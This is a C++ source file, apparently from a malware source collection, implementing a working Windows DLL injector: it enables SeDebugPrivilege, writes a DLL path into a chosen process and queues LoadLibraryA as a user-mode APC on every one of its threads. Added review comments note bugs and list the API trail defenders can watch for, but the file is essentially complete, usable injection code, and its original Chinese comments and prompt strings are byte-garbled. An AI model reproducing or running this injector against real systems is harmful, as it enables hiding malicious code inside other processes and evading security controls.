MalwareSourceCode/Win32/Proof of Concepts/UserApcInject/UserAPC/UserAPC.cpp

/************************************************************************
*
* 1<EFBFBD><EFBFBD><EFBFBD><EFBFBD>EXE<EFBFBD><EFBFBD>ij<EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD>ִ<EFBFBD>е<EFBFBD>SleepEx()<EFBFBD><EFBFBD><EFBFBD><EFBFBD>WaitForSingleObjectEx()ʱ<EFBFBD><EFBFBD>ϵͳ<EFBFBD>ͻ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>жϡ<EFBFBD>
* 2<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><EFBFBD>ٴα<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̻߳<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><EFBFBD>APC<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>еı<EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD>ĺ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
* 3<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>QueueUserAPC()<EFBFBD><EFBFBD><EFBFBD><EFBFBD>API<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD>̵߳<EFBFBD>APC<EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><EFBFBD>
* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dz<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Loadlibrary()ִ<EFBFBD>к<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܴע<EFBFBD><EFBFBD>DLL<EFBFBD><EFBFBD>Ŀ<EFBFBD>ġ<EFBFBD>
* 4) <EFBFBD>߳<EFBFBD><EFBFBD>и<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>״̬<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ΪFALSE<EFBFBD><EFBFBD><EFBFBD>򲻻<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD>APC<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
*************************************************************************/
#include "stdafx.h"
#include "UserAPC.h"
#include <windows.h>
#include <TlHelp32.h>
#include <iostream>
#include <string>
using namespace std;
// Size, in bytes, of the fixed path buffer below. Note that nothing later in
// this file checks against it (see the strcat calls in _tmain).
#define DEF_BUF_SIZE 1024
// Forward declarations; both functions are defined further down in this file.
BOOL AdjustPrivilege();
BOOL InjectModuleToProcessById(DWORD dwProcessId);
// Full path of the DLL to be loaded in the target process. Filled once in
// _tmain (current working directory + "\Dllx64.dll" or "\Dllx86.dll") and
// then copied verbatim into every target by InjectModuleToProcessById.
// Zero-initialised so strcat starts from an empty string.
char szDllPath[DEF_BUF_SIZE] = {0} ;
// Entry point. Builds the absolute path of the payload DLL from the
// injector's *current working directory* (not the executable's directory)
// and then injects it into every process ID read from stdin.
// argc/argv are not used; the target PID is read interactively.
// Always returns 0, even when every injection attempt fails.
int _tmain(int argc, _TCHAR* argv[])
{
// Start the path with the current working directory.
// NOTE(review): the return value is not checked. If the directory name does
// not fit in DEF_BUF_SIZE the buffer is not filled and the path built below
// is just "\Dllx64.dll" / "\Dllx86.dll" relative to the target's cwd.
GetCurrentDirectoryA(DEF_BUF_SIZE, szDllPath);
// Append the DLL name that matches this build's bitness; the payload has to
// match the target's bitness as well, since LoadLibraryA runs inside the target.
// NOTE(review): strcat is unbounded. It stays within DEF_BUF_SIZE only because
// 1024 comfortably exceeds MAX_PATH plus the suffix -- confirm this assumption
// if the process can see long paths (>MAX_PATH).
#ifdef _WIN64
strcat ( szDllPath, "\\Dllx64.dll" ) ;
#else
strcat ( szDllPath, "\\Dllx86.dll" ) ;
#endif
DWORD dwProcessId = 0 ;
// Prompt for a target PID on each iteration; the loop ends on EOF, a
// non-numeric token, or a PID of 0. (The prompt and result strings below are
// byte-garbled in this copy of the file; they are left untouched here.)
while( cout << "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID<EFBFBD><EFBFBD>" && cin >> dwProcessId && dwProcessId > 0 )
{
// TRUE only means at least one APC was queued, not that the DLL loaded.
BOOL bRet = InjectModuleToProcessById(dwProcessId);
cout << (bRet ? "ע<EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>":"ע<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>") << endl ;
}
return 0;
}
// Queue a user-mode APC in every thread of process dwProcessId that calls
// LoadLibraryA with a pointer to a copy of szDllPath placed in the target.
//
// Parameters: dwProcessId - PID of the target process.
// Returns TRUE when at least one APC was queued, FALSE if the process could
// not be opened, the path could not be written, or no thread accepted an APC.
// Queuing is not execution: each APC runs only when its thread next enters an
// alertable wait (SleepEx, WaitFor*Ex with bAlertable, etc.), so the DLL may
// load later or never, and may load once per thread that accepted an APC.
//
// For defenders: the observable sequence is OpenProcess(PROCESS_ALL_ACCESS)
// -> VirtualAllocEx -> WriteProcessMemory -> OpenThread(THREAD_ALL_ACCESS)
// -> QueueUserAPC with LoadLibraryA as the APC routine, followed by an
// unexpected image load in the target. The written path string is never
// freed, so it remains in the target's address space afterwards.
BOOL InjectModuleToProcessById(DWORD dwProcessId)
{
SIZE_T dwRet = 0;
BOOL bStatus = FALSE ;
LPVOID lpData = NULL ;
// Length of the path including its terminating NUL.
UINT uLen = strlen(szDllPath) + 1;
// Enable SeDebugPrivilege on our own token. NOTE(review): the return value
// is ignored, so OpenProcess below may fail later with access denied.
AdjustPrivilege(); //
// Open the target with full access.
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if(hProcess)
{
// Allocate room for the path string in the target. The page is requested
// executable+writable although it only ever holds a string.
// NOTE(review): lpData is never released with VirtualFreeEx, on any path.
lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if ( lpData )
{
// Copy the DLL path into the target. The cast is redundant: dwRet is
// already a SIZE_T.
bStatus = WriteProcessMemory(hProcess, lpData, szDllPath, uLen, (SIZE_T*)(&dwRet));
}
// The process handle is not needed for the APC step; the allocation
// survives the handle being closed.
CloseHandle(hProcess);
}
if (bStatus == FALSE)
return FALSE ;
// Take a system-wide thread snapshot; threads are filtered by owner PID below.
THREADENTRY32 te32 = { sizeof(THREADENTRY32) };
HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if(hThreadSnap == INVALID_HANDLE_VALUE)
return FALSE ;
// Reset: from here on bStatus means "at least one APC queued".
bStatus = FALSE ;
// Walk every thread in the snapshot.
if(Thread32First(hThreadSnap, &te32))
{
do{
// Only threads belonging to the target process are of interest.
if(te32.th32OwnerProcessID == dwProcessId)
{
// Open the thread with full access.
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
if ( hThread )
{
// Queue LoadLibraryA(lpData) as an APC on this thread.
// NOTE(review): LoadLibraryA's signature does not match PAPCFUNC; the
// cast relies on the calling convention tolerating it. The address is
// taken from this process and is only meaningful in the target if
// kernel32 is mapped at the same base there (same bitness; a WOW64
// mismatch will not work) -- confirm before relying on it.
DWORD dwRet1 = QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData);
if ( dwRet1 > 0 )
{
bStatus = TRUE ;
}
CloseHandle(hThread);
}
}
}while(Thread32Next ( hThreadSnap, &te32));
}
CloseHandle(hThreadSnap);
return bStatus;
}
// Enable SeDebugPrivilege (SE_DEBUG_NAME) on the current process token, which
// is typically needed for OpenProcess/OpenThread to succeed against processes
// running under other accounts.
//
// Returns FALSE (after printing a message to stdout) on the first failing API
// call, TRUE otherwise.
//
// NOTE(review): hToken is never closed on any return path, so each call leaks
// a token handle; InjectModuleToProcessById calls this once per attempt.
// NOTE(review): a nonzero result from AdjustTokenPrivileges does not mean the
// privilege was granted -- when the token does not hold it the call still
// succeeds and GetLastError() reports ERROR_NOT_ALL_ASSIGNED, which is not
// checked here. Token privilege adjustments of this kind are also auditable
// on the host, which is one place this tool leaves a trace.
BOOL AdjustPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES pTP;
LUID uID;
// Open our own token with the rights needed to query and adjust privileges.
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return false;
}
// Resolve the LUID of SeDebugPrivilege on the local system.
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID)) // NULL system name = local machine
{
printf("LookupPrivilegeValue is Error\n");
return false;
}
// Describe a single privilege to enable.
pTP.PrivilegeCount = 1;
pTP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pTP.Privileges[0].Luid = uID;
// Apply it to the token; previous state is not requested (NULL, NULL).
// (The message below misspells the API name; it is a runtime string and is
// left as-is here.)
if (!AdjustTokenPrivileges(hToken,false,&pTP,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return false;
}
return true;
}